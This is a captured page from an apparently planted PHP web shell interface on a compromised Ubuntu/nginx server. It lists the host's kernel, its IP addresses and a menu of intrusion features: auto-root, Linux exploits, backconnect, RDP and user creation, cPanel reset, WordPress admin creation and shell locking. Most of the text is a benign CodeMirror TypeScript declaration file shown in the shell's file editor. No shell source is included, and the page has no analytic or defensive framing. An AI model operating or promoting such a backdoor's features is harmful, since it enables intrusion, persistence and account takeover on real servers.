Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.189
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
codemirror /
addon /
dialog /
[ HOME SHELL ]
Name
Size
Permission
Action
dialog.d.ts
2.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dialog.d.ts
import '../../'; export type DialogCloseFunction = () => void; export interface DialogOptions { bottom?: boolean | undefined; } export interface OpenDialogOptions extends DialogOptions { /** If true, the dialog will be closed when the user presses enter in the input. Defaults to true. */ closeOnEnter?: boolean | undefined; /** Determines whether the dialog is closed when it loses focus. Defaults to true. */ closeOnBlur?: boolean | undefined; /** An event handler that will be called whenever keydown fires in the dialog's input. If the callback returns true, the dialog will not do any further processing of the event. */ onKeyDown?(event: KeyboardEvent, value: string, close: DialogCloseFunction): boolean | undefined; /** An event handler that will be called whenever keyup fires in the dialog's input. If the callback returns true, the dialog will not do any further processing of the event. */ onKeyUp?(event: KeyboardEvent, value: string, close: DialogCloseFunction): boolean | undefined; /** An event handler that will be called whenever input fires in the dialog's input. If the callback returns true, the dialog will not do any further processing of the event. */ onInput?(event: KeyboardEvent, value: string, close: DialogCloseFunction): boolean | undefined; /** A callback that will be called after the dialog has been closed and removed from the DOM. */ onClose?(instance: HTMLElement): void; } export interface OpenNotificationOptions extends DialogOptions { duration?: number | undefined; } declare module '../../' { interface Editor { /** Provides a very simple way to query users for text input. */ openDialog(template: string | Node, callback: (value: string, e: Event) => void, options?: OpenDialogOptions): DialogCloseFunction; openNotification(template: string | Node, options?: OpenNotificationOptions): DialogCloseFunction; openConfirm(template: string | Node, callbacks: ReadonlyArray<(editor: Editor) => void>, options?: DialogOptions): DialogCloseFunction; } }
Close